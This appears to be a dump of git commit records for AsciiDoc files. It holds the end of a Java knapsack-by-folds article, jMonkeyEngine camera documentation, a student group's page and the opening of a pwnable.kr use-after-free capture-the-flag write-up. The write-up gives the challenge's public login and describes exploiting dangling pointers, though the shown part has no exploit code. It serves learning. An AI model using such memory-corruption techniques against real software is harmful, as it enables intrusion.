thirty items. To make this program really useful, we must find a way to write it with a single recursive call, or, better, not using recursion at all (beside recursion in the `List` class). This is what I will show in a next article.","old_contents":"= Folding the Universe, part I\n:published_at: 2016-06-11\n\nFolding the Universe is actually the title of a book by Peter Engel which is subtitled \"Origami From Angelfish to Zen\", suggesting that anything in the universe may be modelled out of folded paper. The analogy with computer programming is interesting since, in functional programming, nearly every problem can be solve with folds.\n\nComputer programming is primarily about abstraction. Instead of doing the same basic tasks again an again, we once write programs to performs these tasks, and we can then build larger programs by composing these basic tasks. Probably one difference between functional and imperative programmers is the way they handle task abstractions. Most often, imperative programmers start thinking about abstracting subtasks when they realize that they are repeatedly writing the same code. But the depth of abstraction is often kept quite minimal. The main reason is that higher level abstractions are generally provided by the language. Arithmetic operations on integers, for example, is provided by nearly all programming languages, so there is no need to write specific code to abstract them (although it is possible, and and an interesting challenge!).\n\nLoops are another kind of abstraction that is provided by many languages. Most imperative programmers would not believe that there exist programming languages without loops. Is it possible to program without loops? Of course, it is. It is even possible to program with absolutely no control structures.\n\nMaybe you think that it is possible in some very specific languages specially designed for this. Nothing could be more wrong. Take Java, for example. It is perfectly possible to write any program without ever using a for loop, a while loop, a switch case selector, or event an if..else construct. You don't believe it? Read on.\n\nNot only you can write java program without any control structure, but you can also completely avoid variables. Is this useful? Well, avoiding variables is indeed very useful to write safer concurrent programs since it frees us from all concurrency problems, such as deadlock, livelocks, stale data, races, corruption and more. Avoiding control structures also brings many advantages, but it is more difficult to make it evident. Evidence comes with usage. But in all cases, it is a very rewarding challenge. So why not give it a try?\n\nIf you are the kind of programmer who think in terms of best practices, design patterns, productivity through the use of multiple libraries, or if you have ever thought that \"this is not the way Java (or anything else) has been intended to be used\", or if you think that we should never try to reinvent the wheel, you should probably not continue reading. (By the way, if the wheel had not been reinvented many times, it would still be circular and spinning around its center, so there would be no cars, no trains, nor anything else using modern wheels, but this is another story.\n\n== The challenge\n\nThe challenge is to solve a well known computer problem while using no variables (only constants) and no control structures. We can create classes and methods, we can use the arithmetic operations and comparisons (we could do without, but we would have to design a whole number system with operators, based on folds, which is perfectly feasible, but a bit cumbersome. We will use Java 8 `Function` and `BiFunction`, because creating ours would be a waste of time (but minimal, since this would need only three lines of code each).\n\nThe problem to solve is known as the Knapsack problem. Basically, it consist in packing a knapsack with items in the best possible manner. The knapsack has a maximum capacity, and each item has a name, a weight and a value. The goal is to pack the maximum value in the knapsack without exceeding its capacity. If you want to get an idea of how to solve this in a traditional imperative manner in Java, you can look at this example: https:\/\/rosettacode.org\/wiki\/Knapsack_problem\/0-1#Java[Knapsack problem\/0-1]. I strongly encourage you to look at the example to have an idea of how this problem may be solved in imperative style in just 300 lines of code.\n\n== How to handle the problem\n\nFirst, we will define the business objects. Although being functional, our program will still be object oriented. The first thing we will need is a class to represent items. It will be a very basic class:\n\n[source,java]\n----\npublic class Item {\n public final String name;\n public final int weight;\n public final double value;\n\n private Item(String name, int weight, double value) {\n this.name = name;\n this.weight = weight;\n this.value = value;\n }\n\n public String toString() {\n return String.format(\"item(%s, %s, %s)\", name, weight, value);\n }\n\n public static Item item(String name, int weight, double value) {\n return new Item(name, weight, value);\n }\n}\n----\n\nIf you don't like public fields, feel free to make them private an write the corresponding getters. It is absolutely useless, however, just making the code longer. Note that the factory method is for convenience. It generally allows putting validation code, which we do not have here. The `toString` method is also for convenience, in order to print the result. In fact, there is absolutely no logic here.\n\nThen, we need a class to represent the knapsack:\n\n[source,java]\n----\npublic class Knapsack {\n\n private final List<Item> items;\n private final double value;\n private final int weight;\n private final int available;\n\n private Knapsack(double value, List<Item> items, int weight, int available) {\n this.value = value;\n this.items = items;\n this.weight = weight;\n this.available = available;\n }\n\n private Knapsack add(Item item) {\n return new Knapsack(this.value + item.value, this.items.cons(item), this.weight + item.weight, this.available - item.weight);\n }\n\n private boolean canAccept(Item item) {\n return item.weight <= this.available;\n }\n\n private Knapsack maxValue(Knapsack that) {\n return this.value >= that.value ? this : that;\n }\n\n public String toString() {\n return String.format(\"Total value: %s\\nTotal weight: %s\\nItems:\\n%s\",\n value, weight, items.foldRight(\"\",\n (item, string) -> String.format(\"\\t%s\\n%s\", item, string)));\n }\n\n private static Knapsack empty(int capacity) {\n return new Knapsack(0.0, List.list(), 0, capacity);\n }\n\n private static Knapsack pack(List<Item> items, Knapsack knapsack) {\n ...\n }\n\n public static Knapsack pack(List<Item> items, int knapsackCapacity) {\n return pack(items, empty(knapsackCapacity));\n }\n}\n----\n\nAs you can see, a `Knapsack` has four properties: a list of items, a value, a weight, and an available capacity, meaning how much weight can be added before the knapsack is full. The `value` and `weight` fields are for convenience and optimization. We could compute them each time we need them, but it would waste time. They are used for memoization of the weight an value, which trades times against memory space.\n\nThe constructor is private, and we have only one factory method called `empty` that creates an empty knapsack. Adding an item to the knapsack is done through the `add` method, which does not mutate anything but creates and returns a new `Knapsack` with the updated value. You might argue that the `List<Item>` is mutated, but it is not, because it is not a Java `List`. More on this later.\n\nThere are three utility methods: `canAccept(Item)` allows knowing if the knapsack has enough available capacity to receive a given item. The `maxValue` method compares two `Knapsack` instances and returns the one with the greatest value. The `toString` method, of course, returns a readable representation of the knapsack. All these methods are for convenience and could be avoided.\n\nThe interesting part is the `pack` method, which takes a list of items and a `Knapsack` and returns the `Knapsack` (in fact a new one) with as much value as possible packed in it. Plus, there is a convenience `pack` method taking a list of items and a capacity.\n\nBefore looking at the core of the problem (the `pack` method), lets see how this program will be used:\n\n[source,java]\n----\n public static void main(String... args) {\n\n int capacity = 400;\n\n final List<Item> items = List.<Item>list()\n .cons(Item.item(\"map\", 9, 150.0))\n .cons(Item.item(\"compass\", 13, 35.0))\n .cons(Item.item(\"water\", 153, 200.0))\n .cons(Item.item(\"sandwich\", 50, 160.0))\n .cons(Item.item(\"glucose\", 15, 60.0))\n .cons(Item.item(\"tin\", 68, 45.0))\n .cons(Item.item(\"banana\", 27, 60.0))\n .cons(Item.item(\"apple\", 39, 40.0))\n .cons(Item.item(\"cheese\", 23, 30.0))\n .cons(Item.item(\"beer\", 52, 10.0))\n .cons(Item.item(\"cream\", 11, 70.0))\n .cons(Item.item(\"camera\", 32, 30.0))\n .cons(Item.item(\"tshirt\", 24, 15.0))\n .cons(Item.item(\"trousers\", 48, 10.0))\n .cons(Item.item(\"umbrella\", 73, 40.0))\n .cons(Item.item(\"trousers\", 42, 70.0))\n .cons(Item.item(\"overclothes\", 43, 75.0))\n .cons(Item.item(\"notecase\", 22, 80.0))\n .cons(Item.item(\"sunglasses\", 7, 20.0))\n .cons(Item.item(\"towel\", 18, 12.0))\n .cons(Item.item(\"socks\", 4, 50.0))\n .cons(Item.item(\"book\", 30, 10.0));\n\n System.out.println(Knapsack.pack(items, capacity));\n }\n}\n----\n\nAs you can see, it is very simple, although the way the list is constructed may look a bit weird. As said earlier, this is not a Java `List`, but a functional singly linked list. It is represented by an abstract `List` class and two internal subclasses, `Nil` and `Cons` representing the empty and non empty list. A `Nil` has no property, while a `Cons` has a `head`, which is the first element in the list, and a `tail` which is the rest of the list:\n\n[source,java]\n----\npublic abstract class List<A> {\n\n public List<A> cons(A a) {\n return new Cons<>(a, this);\n }\n\n private static class Nil<A> extends List<A> {\n\n }\n\n private static class Cons<A> extends List<A> {\n\n private final A head;\n private final List<A> tail;\n\n private Cons(A head, List<A> tail) {\n this.head = head;\n this.tail = tail;\n }\n }\n\n @SuppressWarnings(\"rawtypes\")\n private static List NIL = new List.Nil();\n\n @SuppressWarnings(\"unchecked\")\n public static <A> List<A> list() {\n return NIL;\n }\n}\n----\n\nAs you can see, it is a very simple data structure. The parent class defines a method `cons` adding an element to the list. It has also a static factory method returning an empty list. Note that this method returns an untyped singleton, which means that their can exist only one empty list. As a consequence, all empty lists are considered equals.\n\n== Folding\n\nNow you can see how the list of items is constructed. However, you may wonder how we could ever use this list, since there is no mean to access its elements. In fact, we only need one operation: folding the list. Any processing you can imagine on a list may be done with a fold. Folding consists in taking a value of the intended result type (generally different from the elements type) and combining it with the first element, then combining the result with the second element and so on until all elements have been processed.\n\n=== Folding right or left\n\nWe can fold a list starting from the left (the head of the list) or for the right (the last element of the list). To fold from the left, we need a left associative operation. To fold from the right, we need... well, you guess.\n\nHere is how we can write a `foldRight` method. First the signature in the abstract parent `List` class:\n\n----\npublic abstract <B> B foldRight(B z, BiFunction<A, B, B> f);\n----\n\nThe `z` parameter is the starting result. It is called `z` by convention, meaning \"zero\", which would be the starting result for the sum of a list of integers.\n\nThe operation used for the fold is represented by a `BiFunction`, taking an `A` (element of the list) and a `B` the current result) and returning a `B` (the next current result). In the `Nil` class, the implementation simply return `z`, since there is no element to which to apply the function:\n\n[source,java]\n----\npublic <B> B foldRight(B z, BiFunction<A, B, B> f) {\n return z;\n}\n----\n\nIn the `Cons` class, the implementation simply combine the `head` element with the result of a recursive call to fold the `tail`:\n\n[source,java]\n----\npublic <B> B foldRight(B z, BiFunction<A, B, B> f) {\n return f.apply(head, tail.foldRight(z, f));\n}\n----\n\nNote that this implementation is recursive, and recursion happens on the stack, so it will blow the stack for lists of more than a few thousands elements. In my book https:\/\/www.manning.com\/books\/functional-programming-in-java[Functional Programming in Java], I show how to make recursion happen on the heap, but this would be a bit too long for this article.\n\n== Folding, folding, folding...\n\nWith this method, we can solve nearly all the problems we might have to solve. To understand how we can do this, it's interesting to first show how we can make a copy of the list, although we will not need this:\n\n[source,java]\n----\npublic List<A> copy() {\n return foldRight(list(), (a, list) -> list.cons(a));\n}\n----\n\nWe simply start with an empty list and add the elements to it, one after the other, starting from the right.\n\nFor our specific problem, we will need a `map` method applying a function to all elements of the list. This exactly like a copy, excepted that we apply the function before inserting each element in the new list:\n\n[source,java]\n----\npublic <B> List<B> map(Function<A, B> f) {\n return foldRight(list(), (a, list) -> list.cons(f.apply(a)));\n}\n----\n\nWe will also need a `flatMap` method doing the same thing with a function returning a list. Here is the implementation:\n\n[source,java]\n----\npublic <B> List<B> flatMap(Function<A, List<B>> f) {\n return foldRight(list(), (a, list) -> list.foldRight(f.apply(a), (a2, list2) -> list2.cons(a2)));\n}\n----\n\nThis may look a bit complicated, but it is in fact equivalent to the following, where the `concat` method is used to create a single list my concatenating two lists:\n\n[source,java]\n----\npublic <B> List<B> flatMap(Function<A, List<B>> f) {\n return foldRight(list(), (a, list) -> list.concat(f.apply(a)));\n}\n\npublic List<A> concat(List<A> list) {\n return foldRight(list, (a, acc) -> acc.cons(a));\n}\n----\n\nWe will also need a method to return the length of the list:\n\n[source,java]\n----\nprivate int length() {\n return foldRight(0, (a, length) -> length + 1);\n}\n----\n\nHere, we ignore the elements, simply adding one to the result at each step. (Note that this is a very inefficient way to get the list of a list. Using memoization is much faster although it uses more memory.)\n\nEventually, we will need to access the `head` and the `tail` of the list. But we can't simply add methods for this, since we would not know what to return in the `Nil` class. For the tail, we could return an empty list, but what about the `head`?\n\nThe solution is to return a `List<A>` for the head, which will either be an empty list, for a `Nil`, or a list containing a single element, in case of a `Cons`. Here is the implementation:\n\n[source,java]\n----\npublic List<A> head() {\n return foldRight(list(), (a, list) -> list.length() == 0\n ? list.cons(a)\n : list);\n}\n----\n\nFor the `tail`, we will return a `List<List<A>>`:\n\n[source,java]\n----\npublic List<List<A>> tail() {\n return new Cons<>(foldRight(list(), (a, list) -> list.length() == 0\n ? list\n : list.cons(a)), list());\n}\n----\n\nThese methods are really not very efficient, but it is just to show that everything can be done with a fold. We will optimize these later.\n\nWe now have all the elements we need.\n\n== The heart of the problem\n\nNow, you think we are left with the hard part: implementing the `pack` method. First, let's look at the algorithm:\n\n- look at the first element. If it does not fit in the knapsack, discard it.\n\n- if it fits, lets make two different computations:\n\n * first, add the element to the knapsack and continue with the rest of the list.\n\n * second, discard the element and continue with the rest of the list.\n\n * compare the values of the two results, select the highest, and return it.\n\nCould'it be simpler! Here is the corresponding implementation:\n\n[source,java]\n----\nprivate static Knapsack pack(List<Item> items, Knapsack knapsack) {\n return items.head().flatMap(item -> items.tail().map(itemList -> knapsack.canAccept(item)\n ? pack(itemList, knapsack).maxValue(pack(itemList, knapsack.add(item)))\n : pack(itemList, knapsack))).foldRight(knapsack, (a, b) -> a);\n}\n----\n\nThe only weird thing to remark is that our algorithm returns a list containing the resulting knapsack, so we extract it with `foldRight(knapsack, (a, b) -> a)`\n\nWe're done, and the core of our program has only three lines. (It could be written in only one line!) The `List` class is not at all specific to our program and will be used as part of our future functional library. The rest of the code (the `Item` class and the rest of the `Knapsack` class belong to the business model, and are only a description of our business data. Here is an example of what our program displays:\n\n----\nTotal value: 1030.0\nTotal weight: 396\nItems:\n item(map, 9, 150.0)\n item(compass, 13, 35.0)\n item(water, 153, 200.0)\n item(sandwich, 50, 160.0)\n item(glucose, 15, 60.0)\n item(banana, 27, 60.0)\n item(cream, 11, 70.0)\n item(trousers, 42, 70.0)\n item(overclothes, 43, 75.0)\n item(notecase, 22, 80.0)\n item(sunglasses, 7, 20.0)\n item(socks, 4, 50.0)\n----\n\n== About the head and tail methods\n\nFor these methods, we chose to return lists in order to be able to represent the absence of data. The main problem with this approach is that there is no mean to insure that some additional data will not be inserted by mistake in these lists. To avoid this, we generally use a different class, called `Option`, which is exactly like a `List` but where the `Nil` class is called `None` and the `Cons` class is called `Some` and has no tail. Other than this, it is exactly the same, excepted for the fold method which is called something else, like `getOrElse`. Beside this, it is sometimes difficult to distinguish between real lists (that can have several elements) and \"option\" lists (that can have at most one). This may make the program more difficult to read. On the other hand, it makes it much easier to compose the two cases. In a next article, I'll show in detail what this means.\n\n== The limitations of this solution\n\nI have already indicated that since this program is recursive, and recursion in Java occurs on the stack, and since the stack has a very limited sized, this program will not work for much more than two or three thousands items. This may be out of concern, since a knapsack generally contain much less, but the problem is in fact much more general. It could be use to optimized the way to cut ropes or rods in pieces (while minimizing the loss), or to divide any quantity in the most efficient manner.\n\nRecursion is sometimes called the `goto` of functional programming. This does not mean it should not be used, but that it should be abstracted. This is exactly what `foldRight` and `foldLeft` do. In other words, it is perfectly acceptable to use recursion inside the list class, although it probably should be used only once or twice. But using it in a business program in generally a bad practice. Moreover, in the real life, if we are using Java, we might want to optimize the fold for performance, using standard Java loops. In such case, it would be even more important to encapsulate these \"dirty\" parts in the `List` class. Or, as I already said, we can make recursion happen on the heap rather that on the stack. To learn how to do this, please refer to my book, https:\/\/www.manning.com\/books\/functional-programming-in-java[Functional Programming in Java], or to this article: http:\/\/www.fpinjava.com\/2014\/12\/03\/Stack-safe-recursion-in-Java.html[Stack safe recursion in Java].\n\nThis said, there is a much radical limitation in our example. If you examine the `pack` method, you will see that it is bi-recursive, which means it calls itself twice. This means that for the first level, there will be two calls. each of these two calls will trigger two new calls, for a total of four. It is not difficult to see that this number of calls will grow exponentially. The consequence is that this program will not overflow the stack because it will never run longer enough for this. It will not work for more than around thirty items. To make this program really useful, we must find a way to write it with a single recursive call, or, better, not using recursion at all. This is what I will sho in a next article.","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"91431b39edfa3fbf545594c0582b905dcc00c22d","subject":"Update 2017-05-24-Use-After-Free-fun-in-glibc.adoc","message":"Update 2017-05-24-Use-After-Free-fun-in-glibc.adoc","repos":"icthieves\/icthieves.github.io,icthieves\/icthieves.github.io,icthieves\/icthieves.github.io,icthieves\/icthieves.github.io","old_file":"_posts\/2017-05-24-Use-After-Free-fun-in-glibc.adoc","new_file":"_posts\/2017-05-24-Use-After-Free-fun-in-glibc.adoc","new_contents":"= Pwnable.kr - UAF Writeup \n\/\/See https:\/\/hubpress.gitbooks.io\/hubpress-knowledgebase content\/ for information about the parameters.\n:hp-image: \/images\/covers\/space.jpg\n:published_at: 2017-05-24\n:hp-tags: use-after-free, pwnable.kr, ctf, writeups\n:hp-alt-title: Use-After-Free fun in glibc!\n\n#### Challenge Description: \n> Mommy, what is Use After Free bug?\n> ssh uaf@pwnable.kr -p2222 (pw:guest)\n\n#### First Impressions: \n\nimage::\/images\/blog\/uaf\/uaf1.png[\"The Challenge Directory\"]\n\nHere we find the usual readable source code, executable binary, and unreadable flag.\n\nLooking at the source code we see that it defines a simple virtual class (Human) and its two subclasses (Man\/Woman).\n\nimage::\/images\/blog\/uaf\/main.png[\"The uaf\/cpp main() function\"]\n\nThe switch block is what's interesting to us at the moment.\nWe are prompted with three options:\n\n> [1] Call the *introduce()* method of both the Man and Woman objects.\n\nNotice that both the Man* and Woman* from the *new* keyword are cast to *Human**. Clearly, this objects are in the same class heirarchy, and Human is a common superclass. Further still, notice that we call introduce(), _A function with the same prototype, using two upcasted objects._ Either we are calling the *introduce()* method of the Human class, or there's some as yet unseen polymorphism mechanism that de-obfuscates our function call. Running the code, you can see that *Man->introduce()* and *Woman->introduce()* _do not produce the same output for identical calls_, therefore, *they must be virtual functions.*\n\n(This is, of course, extremely obvious because the classes are both defined in this same readable file, but you can still figure out a lot without the class definitions.)\n\n> [3] Delete (and deconstruct) both the Man and Woman objects.\n\nHuh, so we can delete the objects, then use their newly invalidated pointers to call a function.\n\nimage::\/images\/blog\/uaf\/segfault.png[\"Segfault by accessing a dangling pointer.\"]\n\nSo, it's clearly possible to _use_ our pointers _after they are free'd_, but what weirdness can we cause with this?\nWell, this is where you would start googling \"use after free\", and eventually you might find link:https:\/\/sploitfun.wordpress.com\/2015\/02\/10\/understanding-glibc-malloc\/[this extremely good article on glibc's malloc() internals], and link:https:\/\/sourceware.org\/glibc\/wiki\/MallocInternals[this very handy reference for glibc malloc()], Both of which are required reading to understand the rest of this exploit and write-up.\n\n\n\n\n\n\n\n\n\n\n\n","old_contents":"= Pwnable.kr - UAF Writeup \n\/\/See https:\/\/hubpress.gitbooks.io\/hubpress-knowledgebase content\/ for information about the parameters.\n:hp-image: \/images\/covers\/space.jpg\n:published_at: 2017-05-24\n:hp-tags: use-after-free, pwnable.kr, ctf, writeups\n:hp-alt-title: Use-After-Free fun in glibc!\n\n#### Challenge Description: \n> Mommy, what is Use After Free bug?\n> ssh uaf@pwnable.kr -p2222 (pw:guest)\n\n#### First Impressions: \n\nimage::\/images\/blog\/uaf\/uaf1.png[\"The Challenge Directory\"]\n\nHere we find the usual readable source code, executable binary, and unreadable flag.\n\nLooking at the source code we see that it defines a simple virtual class (Human) and its two subclasses (Man\/Woman).\n\nimage::\/images\/blog\/uaf\/main.png[\"The uaf\/cpp main() function\"]\n\nThe switch block is what's interesting to us at the moment.\nWe are prompted with three options:\n\n> [1] Call the *introduce()* method of both the Man and Woman objects.\n\nNotice that both the Man* and Woman* from the *new* keyword are cast to *Human**. Clearly, this objects are in the same class heirarchy, and Human is a common superclass. Further still, notice that we call introduce(), _A function with the same prototype, using two upcasted objects._ Either we are calling the *introduce()* method of the Human class, or there's some as yet unseen polymorphism mechanism that de-obfuscates our function call. Running the code, you can see that *Man->introduce()* and *Woman->introduce()* _do not produce the same output for identical calls_, therefore, *they must be virtual functions.*\n\n(This is, of course, extremely obvious because the classes are both defined in this same readable file, but you can still figure out a lot without the class definitions.)\n\n> [3] Delete (and deconstruct) both the Man and Woman objects.\n\nHuh, so we can delete the objects, then use their newly invalidated pointers to call a function.\n\nimage::images\/blog\/uaf\/segfault.png[\"Segfault by accessing a dangling pointer.\"]\n\n\n\n\n\n\n\n\n\n\n\n","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"b191543fc6b26fbb7b8ef30641009088eacfbb6c","subject":"Delete the file at '_posts\/2017-07-11-the-students-outpost-about2.adoc'","message":"Delete the file at '_posts\/2017-07-11-the-students-outpost-about2.adoc'","repos":"TheStudentsOutpost\/TheStudentsOutpost.github.io,TheStudentsOutpost\/TheStudentsOutpost.github.io,TheStudentsOutpost\/TheStudentsOutpost.github.io,TheStudentsOutpost\/TheStudentsOutpost.github.io","old_file":"_posts\/2017-07-11-the-students-outpost-about2.adoc","new_file":"_posts\/2017-07-11-the-students-outpost-about2.adoc","new_contents":"","old_contents":"= The Students' Outpost - About\n:published_at: 2017-07-11\n:hp-tags: Students, Outpost, Union\n:hp-alt-title: the students outpost about2\n\nTSO is a group of young people who believe that students should be at the forefront of the emerging nation-wide resistance to Brahminism and fascism. Campuses across the country are in ferment, and it is vital that students politicize and organize to speak truth to power and resist the systematic saffronisation of higher education. We aim to be an open platform that will welcome thinkers, fighters and dreamers of all kinds, as we forge new solidarities and engage critically with questions of our day. The organization shall strive to unite students from across Bangalore in a collective effort that can channel our energies into political action, and in Ambedkar\u2019s words, Educate, Agitate and Organize. Eschewing traditional forms of political organizing, we are in favour of an open, democratic space with no hierarchy (strongly in favour) or institutional affiliation. Only continual self-reflection; about our positions and our privileges will give us the tools to resist the profoundly unjust system we are complicit in.\nTSO is born out of the hope that this an ideal that inspires more young people, and that when we come together, it can be the beginning of something truly radical, subversive and fearless.","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"56017af6e9e6c09e5a5851a0c9c1893035ff197e","subject":"Update making_the_camera_follow_a_character.adoc","message":"Update making_the_camera_follow_a_character.adoc\n\nFixed broken new lines.\r\nAdded IMPORTANT Admonition.","repos":"jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org","old_file":"src\/docs\/asciidoc\/jme3\/advanced\/making_the_camera_follow_a_character.adoc","new_file":"src\/docs\/asciidoc\/jme3\/advanced\/making_the_camera_follow_a_character.adoc","new_contents":"= Making the Camera Follow a 3rd-Person Character\n:author: \n:revnumber: \n:revdate: 2016\/03\/17 20:48\n:relfileprefix: ..\/..\/\n:imagesdir: ..\/..\nifdef::env-github,env-browser[:outfilesuffix: .adoc]\n\n\nWhen players steer a game character with 1st-person view, they directly steer the camera (`flyCam.setEnabled(true);`), and they never see the walking character itself. In a game with 3rd-person view, however, the players see the character walk, and you (the game developer) want to make the camera follow the character around when it walks.\n\nThere are two ways how the camera can do that:\n\n* Registering a chase camera to the player and the input manager.\n* Attaching the camera to the character using a camera node.\n\n*Important:* Using third-person view requires you to deactivate the default flyCam (first-person view). This means that you have to configure your own navigation (<<jme3\/advanced\/input_handling#,key inputs and analogListener>>) that make your player character walk. For moving a physical player character, use `player.setWalkDirection()`, for a non-physical character you can use `player.move()`.\n\n\n== Code Samples\n\nPress the WASD or arrow keys to move. Drag with the left mouse button to rotate.\n\n* link:http:\/\/code.google.com\/p\/jmonkeyengine\/source\/browse\/trunk\/engine\/src\/test\/jme3test\/input\/TestChaseCamera.java[TestChaseCamera.java]\n* link:http:\/\/code.google.com\/p\/jmonkeyengine\/source\/browse\/trunk\/engine\/src\/test\/jme3test\/input\/TestCameraNode.java[TestCameraNode.java]\n\n\n== Camera Node\n\nTo make the camera follow a target node, add this camera node code to your init method (e.g. `simpleInitApp()`). The `target` spatial is typically the player node.\n\n[source,java]\n----\n\n\/\/ Disable the default flyby cam\nflyCam.setEnabled(false);\n\/\/create the camera Node\ncamNode = new CameraNode(\"Camera Node\", cam);\n\/\/This mode means that camera copies the movements of the target:\ncamNode.setControlDir(ControlDirection.SpatialToCamera);\n\/\/Attach the camNode to the target:\ntarget.attachChild(camNode);\n\/\/Move camNode, e.g. behind and above the target:\ncamNode.setLocalTranslation(new Vector3f(0, 5, -5));\n\/\/Rotate the camNode to look at the target:\ncamNode.lookAt(target.getLocalTranslation(), Vector3f.UNIT_Y);\n\n----\n\n[IMPORTANT]\n====\nWhere the example says `camNode.setLocalTranslation(new Vector3f(0, 5, -5));`, you have to supply your own start position for the camera. This depends on the size of your target (the player character) and its position in your particular scene. Optimally, you set this to a spot a bit behind and above the target.\n====\n\n[cols=\"2\", options=\"header\"]\n|===\n\na|Methods\na|Description\n\na|setControlDir(ControlDirection.SpatialToCamera)\na|User input steers the target spatial, and the camera follows the spatial. +\nThe spatial's transformation is copied over the camera's transformation. +\nExample: Use with <<jme3\/advanced\/physics#,CharacterControl>>led spatial.\n\na|setControlDir(ControlDirection.CameraToSpatial)\na|User input steers the camera, and the target spatial follows the camera. +\nThe camera's transformation is copied over the spatial's transformation. Use with first-person flyCam.\n\n|===\n\n*Code sample:*\n\n* link:http:\/\/code.google.com\/p\/jmonkeyengine\/source\/browse\/trunk\/engine\/src\/test\/jme3test\/input\/TestCameraNode.java[TestCameraNode.java] \u2013 Press the WASD or arrow keys to move. Drag with the left mouse button to rotate.\n\n\n== Chase Camera\n\nTo activate the chase camera, add the following code to your init method (e.g. `simpleInitApp()`). The `target` spatial is typically the player node. You will be able to rotate the target by dragging (keeping the left mouse button pressed and moving the mouse).\n\n[source,java]\n----\n\n\/\/ Disable the default flyby cam\nflyCam.setEnabled(false);\n\/\/ Enable a chase cam for this target (typically the player).\nChaseCamera chaseCam = new ChaseCamera(cam, target, inputManager);\nchaseCam.setSmoothMotion(true);\n\n----\n[cols=\"2\", options=\"header\"]\n|===\n\na|Method\na|Description\n\na|setInvertVerticalAxis(true)\na|Invert the camera's vertical rotation Axis \n\na|setInvertHorizontalAxis(true)\na|Invert the camera's horizontal rotation Axis\n\na|setTrailingEnabled(true)\na|Camera follows the target and flies around and behind when the target moves towards the camera. Trailing only works with smooth motion enabled. (Default)\n\na|setTrailingEnabled(false)\na|Camera follows the target, but does not rotate around the target when the target changes direction.\n\na|setSmoothMotion(true)\na|Activate SmoothMotion when trailing. This means the camera seems to accelerate and fly after the character, when it has caught up, it slows down again.\n\na|setSmoothMotion(false)\na|Disable smooth camera motion. Disabling SmoothMotion also disables trailing.\n\na|setLookAtOffset(Vector3f.UNIT_Y.mult(3))\na|Camera looks at a point 3 world units above the target.\n\na|setToggleRotationTrigger(new MouseButtonTrigger(MouseInput.BUTTON_MIDDLE))\na|Enable rotation by keeping the middle mouse button pressed (like in Blender). This disables the rotation on right and left mouse button click.\n\na|setToggleRotationTrigger(new MouseButtonTrigger( +\nMouseInput.BUTTON_MIDDLE), +\nnew KeyTrigger(KeyInput.KEY_SPACE))\na|Activate mutiple triggers for the rotation of the camera, e.g. spacebar and middle mouse button, etc.\n\na|setRotationSensitivity(5f)\na|How fast the camera rotates. Use values around <1.0f (all bigger values are ignored).\n\n|===\n\n*Code sample:*\n\n* link:http:\/\/code.google.com\/p\/jmonkeyengine\/source\/browse\/trunk\/engine\/src\/test\/jme3test\/input\/TestChaseCamera.java[TestChaseCamera.java] \u2013 Press the WASD or arrow keys to move. Drag with the left mouse button to rotate.\n\n\n== Which to Choose?\n\nWhat is the difference of the two code samples above?\n[cols=\"2\", options=\"header\"]\n|===\n\na|CameraNode\na|ChaseCam\n\na|Camera follows immediately, flies at same speed as target.\na|Camera moves smoothly and accelerates and decelerates, flies more slowly than the target and catches up.\n\na|Camera stays attached to the target at a constant distance.\na|Camera orbits the target and approaches slowly.\n\na|Drag-to-Rotate rotates the target and the camera. You always see the target from behind.\na|Drag-to-Rotate rotates only the camera. You can see the target from various sides.\n\n|===\n","old_contents":"= Making the Camera Follow a 3rd-Person Character\n:author: \n:revnumber: \n:revdate: 2016\/03\/17 20:48\n:relfileprefix: ..\/..\/\n:imagesdir: ..\/..\nifdef::env-github,env-browser[:outfilesuffix: .adoc]\n\n\nWhen players steer a game character with 1st-person view, they directly steer the camera (`flyCam.setEnabled(true);`), and they never see the walking character itself. In a game with 3rd-person view, however, the players see the character walk, and you (the game developer) want to make the camera follow the character around when it walks.\n\nThere are two ways how the camera can do that:\n\n* Registering a chase camera to the player and the input manager.\n* Attaching the camera to the character using a camera node.\n\n*Important:* Using third-person view requires you to deactivate the default flyCam (first-person view). This means that you have to configure your own navigation (<<jme3\/advanced\/input_handling#,key inputs and analogListener>>) that make your player character walk. For moving a physical player character, use `player.setWalkDirection()`, for a non-physical character you can use `player.move()`.\n\n\n== Code Samples\n\nPress the WASD or arrow keys to move. Drag with the left mouse button to rotate.\n\n* link:http:\/\/code.google.com\/p\/jmonkeyengine\/source\/browse\/trunk\/engine\/src\/test\/jme3test\/input\/TestChaseCamera.java[TestChaseCamera.java]\n* link:http:\/\/code.google.com\/p\/jmonkeyengine\/source\/browse\/trunk\/engine\/src\/test\/jme3test\/input\/TestCameraNode.java[TestCameraNode.java]\n\n\n== Camera Node\n\nTo make the camera follow a target node, add this camera node code to your init method (e.g. `simpleInitApp()`). The `target` spatial is typically the player node.\n\n[source,java]\n----\n\n\/\/ Disable the default flyby cam\nflyCam.setEnabled(false);\n\/\/create the camera Node\ncamNode = new CameraNode(\"Camera Node\", cam);\n\/\/This mode means that camera copies the movements of the target:\ncamNode.setControlDir(ControlDirection.SpatialToCamera);\n\/\/Attach the camNode to the target:\ntarget.attachChild(camNode);\n\/\/Move camNode, e.g. behind and above the target:\ncamNode.setLocalTranslation(new Vector3f(0, 5, -5));\n\/\/Rotate the camNode to look at the target:\ncamNode.lookAt(target.getLocalTranslation(), Vector3f.UNIT_Y);\n\n----\n\n*Important:* Where the example says `camNode.setLocalTranslation(new Vector3f(0, 5, -5));`, you have to supply your own start position for the camera. This depends on the size of your target (the player character) and its position in your particular scene. Optimally, you set this to a spot a bit behind and above the target.\n[cols=\"2\", options=\"header\"]\n|===\n\na|Methods\na|Description\n\na|setControlDir(ControlDirection.SpatialToCamera)\na|User input steers the target spatial, and the camera follows the spatial.+The spatial's transformation is copied over the camera's transformation. +Example: Use with <<jme3\/advanced\/physics#,CharacterControl>>led spatial.\n\na|setControlDir(ControlDirection.CameraToSpatial)\na|User input steers the camera, and the target spatial follows the camera. +The camera's transformation is copied over the spatial's transformation. Use with first-person flyCam.\n\n|===\n\n*Code sample:*\n\n* link:http:\/\/code.google.com\/p\/jmonkeyengine\/source\/browse\/trunk\/engine\/src\/test\/jme3test\/input\/TestCameraNode.java[TestCameraNode.java] \u2013 Press the WASD or arrow keys to move. Drag with the left mouse button to rotate.\n\n\n== Chase 